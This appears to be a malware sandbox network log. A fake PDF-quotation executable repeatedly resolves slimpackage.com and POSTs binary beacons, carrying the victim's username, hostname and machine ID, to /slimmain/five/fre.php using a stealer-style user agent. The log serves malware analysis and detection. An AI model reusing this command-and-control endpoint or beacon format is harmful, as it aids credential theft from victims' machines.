Jan 14, 2022 17:29:44.712246895 CET	192.168.2.5	8.8.8.8	0x8267	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:46.758122921 CET	192.168.2.5	8.8.8.8	0xd0ae	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:50.919126987 CET	192.168.2.5	8.8.8.8	0xf5d9	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:53.559356928 CET	192.168.2.5	8.8.8.8	0x2566	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:55.574177027 CET	192.168.2.5	8.8.8.8	0xf2bf	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:57.418695927 CET	192.168.2.5	8.8.8.8	0xac0e	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:59.970988035 CET	192.168.2.5	8.8.8.8	0xcc3a	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:30:01.880326033 CET	192.168.2.5	8.8.8.8	0x2c7d	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:30:03.246323109 CET	192.168.2.5	8.8.8.8	0xf940	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:30:04.588593960 CET	192.168.2.5	8.8.8.8	0xc907	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:30:06.287013054 CET	192.168.2.5	8.8.8.8	0x402c	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:30:07.919339895 CET	192.168.2.5	8.8.8.8	0x6262	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:30:09.826633930 CET	192.168.2.5	8.8.8.8	0xfc4b	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 14, 2022 17:28:13.115070105 CET	8.8.8.8	192.168.2.5	0xcc77	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:14.831212997 CET	8.8.8.8	192.168.2.5	0x2fa2	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:16.466959953 CET	8.8.8.8	192.168.2.5	0xefad	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:18.784615993 CET	8.8.8.8	192.168.2.5	0x3ce6	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:21.063589096 CET	8.8.8.8	192.168.2.5	0x8000	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:23.122594118 CET	8.8.8.8	192.168.2.5	0x4772	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:24.605462074 CET	8.8.8.8	192.168.2.5	0x76d2	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:25.956110001 CET	8.8.8.8	192.168.2.5	0x1ce3	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:27.683886051 CET	8.8.8.8	192.168.2.5	0x2531	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:29.126961946 CET	8.8.8.8	192.168.2.5	0xdc7f	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:30.458503962 CET	8.8.8.8	192.168.2.5	0x29b6	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:31.827296972 CET	8.8.8.8	192.168.2.5	0xd171	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:35.069721937 CET	8.8.8.8	192.168.2.5	0xbf81	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:37.494354010 CET	8.8.8.8	192.168.2.5	0xd37b	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:40.894728899 CET	8.8.8.8	192.168.2.5	0xef55	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:45.531521082 CET	8.8.8.8	192.168.2.5	0x734c	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:47.250000954 CET	8.8.8.8	192.168.2.5	0x84bc	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:48.810790062 CET	8.8.8.8	192.168.2.5	0x2c2b	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:50.667985916 CET	8.8.8.8	192.168.2.5	0x1ed1	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:52.315208912 CET	8.8.8.8	192.168.2.5	0xbf51	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:53.903908968 CET	8.8.8.8	192.168.2.5	0xf1f7	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:55.332171917 CET	8.8.8.8	192.168.2.5	0x3666	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:57.485555887 CET	8.8.8.8	192.168.2.5	0x34a	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:58.880289078 CET	8.8.8.8	192.168.2.5	0x1206	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:00.313199043 CET	8.8.8.8	192.168.2.5	0xbb58	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:01.693216085 CET	8.8.8.8	192.168.2.5	0x7fba	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:03.226144075 CET	8.8.8.8	192.168.2.5	0x34ba	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:05.325781107 CET	8.8.8.8	192.168.2.5	0xd94f	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:06.909065008 CET	8.8.8.8	192.168.2.5	0x5a1b	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:08.256097078 CET	8.8.8.8	192.168.2.5	0x2f60	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:11.142402887 CET	8.8.8.8	192.168.2.5	0x8dfb	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:14.052234888 CET	8.8.8.8	192.168.2.5	0xd123	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:16.775743008 CET	8.8.8.8	192.168.2.5	0xc2dc	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:18.556022882 CET	8.8.8.8	192.168.2.5	0xc671	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:23.441941023 CET	8.8.8.8	192.168.2.5	0x2830	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:25.648001909 CET	8.8.8.8	192.168.2.5	0x511b	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:27.575892925 CET	8.8.8.8	192.168.2.5	0x561b	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:29.789906025 CET	8.8.8.8	192.168.2.5	0x46ba	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:32.720993996 CET	8.8.8.8	192.168.2.5	0xe1d0	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:34.742059946 CET	8.8.8.8	192.168.2.5	0xf4ac	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:36.279872894 CET	8.8.8.8	192.168.2.5	0xd601	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:37.662089109 CET	8.8.8.8	192.168.2.5	0xf120	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:39.019954920 CET	8.8.8.8	192.168.2.5	0x4137	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:40.392208099 CET	8.8.8.8	192.168.2.5	0xe792	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:41.792356014 CET	8.8.8.8	192.168.2.5	0x5997	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:43.299621105 CET	8.8.8.8	192.168.2.5	0x38e4	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:44.731709957 CET	8.8.8.8	192.168.2.5	0x8267	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:46.777492046 CET	8.8.8.8	192.168.2.5	0xd0ae	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:50.937889099 CET	8.8.8.8	192.168.2.5	0xf5d9	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:53.576899052 CET	8.8.8.8	192.168.2.5	0x2566	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:55.593589067 CET	8.8.8.8	192.168.2.5	0xf2bf	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:57.436048031 CET	8.8.8.8	192.168.2.5	0xac0e	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:59.990144014 CET	8.8.8.8	192.168.2.5	0xcc3a	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:30:01.900036097 CET	8.8.8.8	192.168.2.5	0x2c7d	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:30:03.264153004 CET	8.8.8.8	192.168.2.5	0xf940	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:30:04.710212946 CET	8.8.8.8	192.168.2.5	0xc907	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:30:06.306135893 CET	8.8.8.8	192.168.2.5	0x402c	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:30:07.938632011 CET	8.8.8.8	192.168.2.5	0x6262	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)
Jan 14, 2022 17:30:09.846517086 CET	8.8.8.8	192.168.2.5	0xfc4b	No error (0)	slimpackage.com	104.223.93.105	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

slimpackage.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49754	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:13.315745115 CET	1223	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 192 Connection: close
Jan 14, 2022 17:28:13.446605921 CET	1223	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: 'ckav.rualfons642294DESKTOP-716T771k08F9C4E9C79A3B52B3F739430525Di
Jan 14, 2022 17:28:13.586972952 CET	1223	IN	HTTP/1.1 404 Not Found Date: Fri, 14 Jan 2022 16:28:12 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49755	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:14.966907978 CET	1224	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 192 Connection: close
Jan 14, 2022 17:28:15.098073006 CET	1224	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: 'ckav.rualfons642294DESKTOP-716T771+08F9C4E9C79A3B52B3F739430yPHRQ
Jan 14, 2022 17:28:15.236922026 CET	1225	IN	HTTP/1.1 404 Not Found Date: Fri, 14 Jan 2022 16:28:14 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49768	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:30.598054886 CET	1245	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:30.729804993 CET	1245	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:30.869498968 CET	1245	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:29 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49769	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:31.998392105 CET	1246	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:32.126750946 CET	1246	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:32.371730089 CET	1247	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:31 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49772	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:35.257565022 CET	1270	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:35.388864040 CET	1270	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:35.598879099 CET	1270	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:34 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.5	49773	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:37.734698057 CET	1271	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:37.887132883 CET	1272	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:38.027388096 CET	1272	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:37 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.5	49774	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:44.091710091 CET	1273	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:44.225761890 CET	1273	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:44.368436098 CET	1273	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:43 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.5	49775	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:45.667839050 CET	1274	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:45.798913002 CET	1274	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:46.151256084 CET	1275	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:46.295262098 CET	1275	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:44 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.5	49776	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:47.384706974 CET	1276	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:47.514906883 CET	1276	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:47.653799057 CET	1276	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:46 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.5	49777	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:48.947782993 CET	1277	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:49.085401058 CET	1277	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:49.225759983 CET	1278	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:48 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.5	49778	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:50.801698923 CET	1279	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:50.978789091 CET	1279	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:51.116813898 CET	1279	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:50 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.5	49780	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:52.454046965 CET	1290	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:52.586828947 CET	1290	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:52.726126909 CET	1290	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:51 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49757	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:16.603027105 CET	1225	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:16.734231949 CET	1226	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
